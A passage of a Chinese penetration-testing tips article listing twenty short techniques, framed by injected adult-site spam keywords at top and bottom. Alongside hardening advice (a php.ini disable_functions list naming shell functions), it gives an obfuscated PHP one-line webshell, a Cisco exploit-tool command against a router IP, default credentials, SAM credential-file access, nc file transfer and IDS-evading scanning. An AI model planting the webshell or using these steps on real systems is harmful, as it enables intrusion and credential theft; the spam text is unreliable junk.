成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

滲透測試筆記五

安全 黑客攻防
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。

滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。

1、小小一招,讓你的電腦安全起來:在“運行”對話框中輸入“gpedit.msc”打開“本地組策略編輯器”窗口,展開“用戶配置/管理模板/系統”目錄,可雙擊配置禁止運行指定程序、禁止訪問注冊表、禁止訪問命令提示符、禁止訪問控制面板等策略。

2、在注冊表編輯器中,依次打開HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug分支,雙擊“Auto”鍵值項,可以防止系統隱私信息被泄露。(應該是禁止生成dmp文件。)

3、HTTP協議代理服務器常用端口號:

80(Apache服務器默認、Nginx服務器默認、lighttpd服務器默認)
8080(tomcat服務器默認、kangle服務器默認)
3128(Squid服務器默認)
8081(用戶習慣)
9080(WebSpher服務器默認)
7001(weblogic的默認端口)

4、在php.ini禁止一些危險函數的執行:

如果不希望執行包括system()等在那的能夠執行命令的php函數,或者能夠查看php信息的phpinfo()等函數,那么我們就可以禁止它們:

disable_functions = system,passthru,exec,shell_exec,popen,phpinfo

如果你要禁止任何文件和目錄的操作,那么可以關閉很多文件操作:

disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir, rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

此時就能夠抵制大部分的phpshell了。

5、一個非常聰(淫)明(蕩)的隱藏一句話方法:

$asse=$asse{0}.$asse{1}.$asse{1}.$asse{2}.$asse{3}.$asse{4};
@$asse($_POST[$_GET['s']]);

6、默認情況下,Linux系統的TTL值為64或255,Windows NT/2000/XP系統的默認TTL值為128,Win7系統的TTL值是64,Windows 98系統的TTL值為32,UNIX主機的TTL值為255。(但這是可以修改的)

7、在使用Nmap掃描端口的時候,端口狀態可能會出現filtered / unfiltered.filtered是指有防火墻或是其他過濾裝置在對這個端口進行過濾,所以Nmap需要進一步查明端口是否開放;unfiltered狀態只有在大多數的掃描端口都處在filter狀態下才出現,說明Nmap能夠訪問這個端口,但是不清楚這個端口打開的狀態。

8、安全漏洞生命周期(圖片摘自諸葛建偉《Matesploit滲透測試魔鬼訓練營》)

 

wKioJlIxUJDicqyiAACHkmlpiXA436

 

9、msfpayload、msfencode和msfvenom可以將攻擊載荷封裝為可執行文件、C語言、JavaScript語言等多種形式,并可以進行各種類型的編碼。

10、Metasploit攻擊載荷模塊分為獨立(Singles)、傳輸器(Stager)、傳輸體(Stage)三種類型。

例如:“windows/shell_bind_tcp”是一個獨立攻擊載荷。“windows/shell/bind_tcp”是一個由傳輸器載荷(bind_tcp)和一個傳輸體載荷(shell)所組成,其功能相當于“windows/shell_bind_tcp”。

11、Metasploit在自動為payload選擇編碼器進行編碼時,可能找不到合適的編碼器。因為這個編碼器既能夠將編碼后的payload大小控制在一定范圍內,又要完全避免出現“壞字符”。這種情況下就會出現“No encoder encoded the buffer succcessfully”報錯。

12、BackTrack5 升級Metasploit至Git更新的方法 (無法使用msfupdate解決方法):

(1)用vim修改文件:

/opt/metasploit/ruby/lib/ruby/1.9.1/i686-linux/rbconfig.rb
changed the line => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" by => CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) "(其實就是去掉-l$(RUBY_SO_NAME)-static)

(2)切換至

/opt/metasploit/msf3

然后運行

/opt/metasploit/ruby/bin/bundle install

(3)

msfupdate

(小編親測不行,是由于我以前對MSF的改動較多嗎?各位騷年還是換Kali吧!不過如果不是特別專業的滲透測試人員,沒必要總是保持最新狀態,不必在乎這些細節 :))

13、利用BT5檢查cisco路由器是否出現漏洞

定位到以下目錄:

/pentest/cisco/cisco-global-exploiter

運行名為cge.pl的Perl文件,這個文件沒有任何選項。根據運行的版本的不同,屏幕上最多會出現14個不同的選項,每個選項都會引用一個試圖利用不同漏洞的腳本。這能夠幫助企業更有效地測試路由器面向外部的接口,企業應該經常進行測試。91ri.org注:這個是在backtrack下的 其他滲透系統自行find

假設測試的路由器有一個外部IP地址200.1.1.1,輸入以下命令:

./cge.pl 200.1.1.1 2

14、大家都知道思科的默認用戶名和默認密碼都是cisco,很多管理員喜歡把enable口令改成class。

15、安全帳戶管理器多年來一直是微軟操作系統的核心部分,現在也是Windows 8.1的一部分。SAM的功能固定于lsass.exe中。lsass.exe是一個位于c:\Windows\system32的Windows服務。

16、SAM的備份文件位于c:\windows\system32\repair\。如果密碼被定期更改,過期密碼會包含在這個文件中,但登錄到計算機的任何賬戶都可以訪問到這個文件。只需要在機器上創建一個普通帳戶,就可以查看了。

17、ssh反彈內網端口幾個比較重要的參數:

1-f: 連接成功后切換到后臺,不會占用當前的shell,shell斷了也會繼續執行,相當于 nohup和&。

2-N: 連接后不調用shell

3-R:把本地網絡(可以是本機或者任何內網甚至外網端口)端口反彈到ssh服務器

18、用nc方法往linux系統傳文件:

先在服務端監聽:

nc -l port > 文件名

然后到要發送文件的服務器:

nc 服務端ip 端口 < 文件名

(注:發送小文件還行,大文件有時候會斷。)

19、有些時候你拿了linux服務器的shell,想跨到windows的機器上,基本就是通過兩個手段,一個是針對windows的服務進行exploit溢出,還有就是利用在linux上搜集的用戶名和密碼然后通過psexec放shell。

20、想要確定是不是windows主機,在內網掃開445和3389的機器,基本是windows了。掃的時候要注意,不管用什么工具,盡量用socket connect的方式掃。像SYN 方式掃描如果內網有ids之類肯定會被發現,connect方式掃描相對來說和正常連接差不多。

責任編輯:藍雨淚 來源: 網絡安全攻防實驗室
相關推薦

2013-11-28 11:29:39

2013-11-28 13:03:17

2014-02-18 15:53:04

2013-12-10 09:51:18

2013-12-30 13:11:03

2014-04-03 09:35:28

2013-11-28 10:32:10

2009-01-07 21:03:53

程序員循環語句

2014-11-21 10:32:33

2023-05-16 12:24:53

2016-07-14 10:43:34

2021-05-31 09:48:24

網絡釣魚滲透測試網絡安全

2014-05-16 10:55:47

Spark

2022-02-22 11:20:56

滲透測試網絡安全

2017-10-16 06:17:29

2010-08-03 22:09:16

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2016-09-09 01:14:17

2017-07-24 17:00:49

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 午夜国产| 成人伊人网| 国产成人免费视频网站视频社区 | 精品av| 二区精品 | 亚洲色图网址 | 国产精品综合色区在线观看 | 日本三级电影在线免费观看 | 福利网站在线观看 | 五月天婷婷久久 | 超碰免费观看 | 亚洲成人一级 | 日日夜夜操天天干 | 日韩一二区在线观看 | 国产精品揄拍一区二区久久国内亚洲精 | 一区中文字幕 | 久草免费在线视频 | 999热在线视频| 人人射人人草 | h视频在线观看免费 | 亚洲电影第1页 | 精品视频免费 | 四色永久 | 狠狠狠干 | 91秦先生艺校小琴 | 亚洲视频欧美视频 | 国产欧美精品 | 午夜影院网站 | www.日本国产 | 久久久久久久一区二区 | 一区二区在线不卡 | 久久久久久国产精品mv | 欧美精品中文字幕久久二区 | 偷拍亚洲色图 | 国产女人精品视频 | 亚洲一区亚洲二区 | 日本大片在线播放 | 亚洲一区二区在线视频 | 久久久精品视频一区二区三区 | 精品国产一区二区三区久久久蜜月 | 性在线 |